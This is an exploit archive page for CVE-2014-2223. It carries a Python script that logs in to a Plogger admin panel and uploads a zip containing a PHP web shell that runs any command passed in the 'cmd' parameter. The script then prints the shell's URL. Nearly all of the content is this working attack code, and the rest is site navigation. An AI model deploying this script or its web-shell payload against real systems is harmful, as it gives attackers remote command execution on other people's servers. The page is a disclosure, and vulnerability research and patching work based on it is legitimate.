Plogger Authenticated Arbitrary File Upload

Plogger Authenticated Arbitrary File Upload: Posted Aug 28, 2014; Authored by b0z; Plogger versions prior to 1.0-RC1 suffer from a remote authenticated arbitrary file upload vulnerability.; tags | exploit, remote, arbitrary, file upload; advisories | CVE-2014-2223; SHA-256 | 2229ede1572118bc72b109ff7e6d3bbcc1f082c43c519ec37c7328ee927f4032; Download | Favorite | View

Plogger Authenticated Arbitrary File Upload

#!/usr/bin/env python


# Exploit Title: Plogger Authenticated Arbitrary File Upload
# Date: Feb 2014
# Exploit Author: b0z
# Vendor Homepage: www.plogger.org
# Software Link: www.plogger.org/download
# Version: Plogger prior to 1.0-RC1
# CVE : 2014-2223

import hashlib
import os
import zipfile

import requests
import time
import argparse



def login(session,host,username,password):
    print "[+] Log in"

    session.post('http://%s/plog-admin/plog-upload.php' % host, data={
        "plog_username": username,
        "plog_password": password,
        "action": "log_in"
    })

def upload(session):
    print "[+] Creating poisoned gift"
    ## Write the backdoor
    backdoor = open(magic + '.php', 'w+', buffering = 0)
    backdoor.write("<?php system($_GET['cmd']) ?>")
    backdoor.close

    # Add true image file to block the race condition (mandatory not null)
    image = open(magic + '.png', 'w+', buffering = 0)
    image.write('A')
    image.close

    gift = zipfile.ZipFile(magic + '.zip', mode = 'w')
    gift.write(magic + '.php')
    gift.write(magic + '.png')
    gift.close

    os.remove(magic + '.php')
    os.remove(magic + '.png')

    gift = open(magic + '.zip', 'rb')
    files= { "userfile": ("archive.zip", gift)}
    session.post('http://%s/plog-admin/plog-upload.php' % host, files=files,
        data = {
            "destination_radio":"existing",
            "albums_menu" : "1",
            "new_album_name":"",
            "collections_menu":"1",
            "upload":"Upload"
    })

    os.remove(magic + '.zip')
    print '[+] Here we go ==> http://%s/plog-content/uploads/archive/%s.php' % (host,magic)

if __name__== "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument("--host"        , help="Remote host",required=True)
    parser.add_argument("--user"        , help="Username",required=True)
    parser.add_argument("--password"    , help="Password",required=True)
    args = parser.parse_args()

    host     = args.host
    username = args.user
    password = args.user

    magic = hashlib.sha1(time.asctime()).hexdigest()

    session = requests.session()
    login(session,host,username,password)
    upload(session)

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 65 files
LiquidWorm 25 files
Debian 18 files
indoushka 15 files
Apple 10 files
Google Security Research 7 files
Gentoo 5 files
Emiliano Febbi 3 files
Chokri Hammedi 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,155)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,813)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,236)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,965)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Plogger Authenticated Arbitrary File Upload

Plogger Authenticated Arbitrary File Upload

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Plogger Authenticated Arbitrary File Upload

Share This

Plogger Authenticated Arbitrary File Upload

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems